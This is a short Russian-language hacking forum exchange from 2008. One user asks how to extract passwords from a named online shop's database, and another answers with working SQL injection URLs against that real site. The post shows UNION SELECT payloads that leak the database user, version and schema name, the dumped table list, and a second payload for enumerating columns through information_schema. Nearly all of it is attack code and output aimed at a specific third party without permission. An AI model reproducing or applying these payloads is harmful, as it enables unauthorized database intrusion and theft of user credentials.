
03.03.2008, 23:51
|
|
Познающий
Регистрация: 22.02.2008
Сообщений: 74
Провел на форуме: 394753
Репутация:
120
|
|
Сообщение от Digital Cat
Мальчики, хелп. Вот как выудить из бд пароли?  Пока все заканчивалось ошибкой((
http://www.angelbaby.ru/tovar.php?ld=1+union+select+1,2,user(),database(), 5,6,7,version(),9,10,11,12,13/*
Код:
babykn@localhost
5.0.45-community
babykn_angel
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
arhiv
category
disttxt
links
news
news_img
others
pages
produkt
Ну mysql базы там нет, точнее если и есть то она закрыта
а в остальных таблицах ничего интересного
если ты смотриш через INFORMATION_SCHEMA.TABLES
то лучше поройся через таблицу COLUMNS
пример
http://www.angelbaby.ru/tovar.php?ld=1+union+select+1,2,concat_ws(char(58) ,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),4,5,6,7,8,9, 10,11,12,13+from+information_schema.COLUMNS+limit+ 10+offset+280/*
|
|
|